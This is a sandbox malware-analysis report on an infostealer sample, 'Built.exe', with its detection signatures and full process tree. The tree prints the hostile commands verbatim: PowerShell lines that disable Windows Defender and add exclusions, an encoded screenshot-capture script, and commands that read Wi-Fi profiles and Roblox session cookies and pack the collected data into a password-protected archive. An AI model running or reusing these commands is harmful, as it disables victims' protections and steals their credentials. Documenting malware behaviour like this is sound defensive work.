Resubmissions

21-01-2025 13:35

250121-qvptgawqbk 10

21-01-2025 11:58

250121-n5b91ssqem 10

21-01-2025 11:44

250121-nwlr4a1qhs 10

21-01-2025 11:07

250121-m7zbws1kfn 10

17-07-2024 20:08

240717-ywvp4swhjk 10

Analysis

  • max time kernel
    39s
  • max time network
    42s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240709-en
  • resource tags

    arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    17-07-2024 20:08

General

  • Target

    Built.exe

  • Size

    33.3MB

  • MD5

    bf496771139b8b76ab7e2e3813ce78a3

  • SHA1

    949686fc9af5710904902044e92b0397b337d814

  • SHA256

    92118eac9bf1f5e9cf45e2773f74163202f609125e8f0aa0a077446e6f1cd4d1

  • SHA512

    ce9ab86130380ffc378ae3cd14c67c94f6034631821392aba9c8946eec07591311e7942b45cfe2dacfcae6cfe73495937be9b81790ea66824c3212fcb9cd3bc2

  • SSDEEP

    786432:8Nz4CWGpXkqva096PzXf4mWy1DlIF1qqHdbrtTqslFEO:IkCWGJ446rPu/FQqjqwFd

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 18 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 57 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Built.exe
    "C:\Users\Admin\AppData\Local\Temp\Built.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:816
    • C:\Users\Admin\AppData\Local\Temp\Built.exe
      "C:\Users\Admin\AppData\Local\Temp\Built.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2784
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2260
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:796
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:956
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2012
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1020
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2536
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "start bound.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1060
        • C:\Users\Admin\AppData\Local\Temp\bound.exe
          bound.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2580
          • C:\Windows\Temp\{E3F65CF2-802A-4BBA-8F84-10018EFBC99A}\.cr\bound.exe
            "C:\Windows\Temp\{E3F65CF2-802A-4BBA-8F84-10018EFBC99A}\.cr\bound.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\bound.exe" -burn.filehandle.attached=592 -burn.filehandle.self=572
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:2820
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe""
        3⤵
        • Hide Artifacts: Hidden Files and Directories
        • Suspicious use of WriteProcessMemory
        PID:3624
        • C:\Windows\system32\attrib.exe
          attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe"
          4⤵
          • Views/modifies file attributes
          PID:1760
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍  ‍.scr'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3808
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍  ‍.scr'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:980
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1380
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:5044
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1384
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4600
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3772
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4740
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1552
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2896
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3508
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:3868
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3416
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
            PID:3044
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5000
          • C:\Windows\system32\netsh.exe
            netsh wlan show profile
            4⤵
            • Event Triggered Execution: Netsh Helper DLL
            PID:4160
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "systeminfo"
          3⤵
            PID:4624
            • C:\Windows\system32\systeminfo.exe
              systeminfo
              4⤵
              • Gathers system information
              PID:3940
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
            3⤵
              PID:3952
              • C:\Windows\system32\reg.exe
                REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                4⤵
                  PID:3472
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                3⤵
                  PID:736
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                    4⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:840
                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kgnvy5qm\kgnvy5qm.cmdline"
                      5⤵
                        PID:5552
                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE0FA.tmp" "c:\Users\Admin\AppData\Local\Temp\kgnvy5qm\CSC6B22415FED8E46BCBB31F514185E7EF.TMP"
                          6⤵
                            PID:5776
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      3⤵
                        PID:2200
                        • C:\Windows\system32\tree.com
                          tree /A /F
                          4⤵
                            PID:5172
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                          3⤵
                            PID:3076
                            • C:\Windows\system32\attrib.exe
                              attrib -r C:\Windows\System32\drivers\etc\hosts
                              4⤵
                              • Drops file in Drivers directory
                              • Views/modifies file attributes
                              PID:5188
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                            3⤵
                              PID:5248
                              • C:\Windows\system32\tree.com
                                tree /A /F
                                4⤵
                                  PID:5372
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                3⤵
                                  PID:5284
                                  • C:\Windows\system32\attrib.exe
                                    attrib +r C:\Windows\System32\drivers\etc\hosts
                                    4⤵
                                    • Drops file in Drivers directory
                                    • Views/modifies file attributes
                                    PID:5400
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  3⤵
                                    PID:5432
                                    • C:\Windows\system32\tree.com
                                      tree /A /F
                                      4⤵
                                        PID:5528
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                      3⤵
                                        PID:5480
                                        • C:\Windows\system32\tasklist.exe
                                          tasklist /FO LIST
                                          4⤵
                                          • Enumerates processes with tasklist
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5612
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                        3⤵
                                          PID:5560
                                          • C:\Windows\system32\tree.com
                                            tree /A /F
                                            4⤵
                                              PID:5668
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                            3⤵
                                              PID:5680
                                              • C:\Windows\system32\tree.com
                                                tree /A /F
                                                4⤵
                                                  PID:5732
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                3⤵
                                                  PID:6032
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                    4⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:6104
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                  3⤵
                                                    PID:2900
                                                    • C:\Windows\System32\Conhost.exe
                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      4⤵
                                                        PID:3472
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                        4⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2816
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "getmac"
                                                      3⤵
                                                        PID:32
                                                        • C:\Windows\system32\getmac.exe
                                                          getmac
                                                          4⤵
                                                            PID:5524
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI8162\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\qGGnR.zip" *"
                                                          3⤵
                                                            PID:5528
                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI8162\rar.exe
                                                              C:\Users\Admin\AppData\Local\Temp\_MEI8162\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\qGGnR.zip" *
                                                              4⤵
                                                              • Executes dropped EXE
                                                              PID:5564
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                            3⤵
                                                              PID:5700
                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                wmic os get Caption
                                                                4⤵
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:5772
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                              3⤵
                                                                PID:1044
                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                  wmic computersystem get totalphysicalmemory
                                                                  4⤵
                                                                    PID:4252
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                  3⤵
                                                                    PID:1516
                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                      wmic csproduct get uuid
                                                                      4⤵
                                                                        PID:2352
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                      3⤵
                                                                        PID:5052
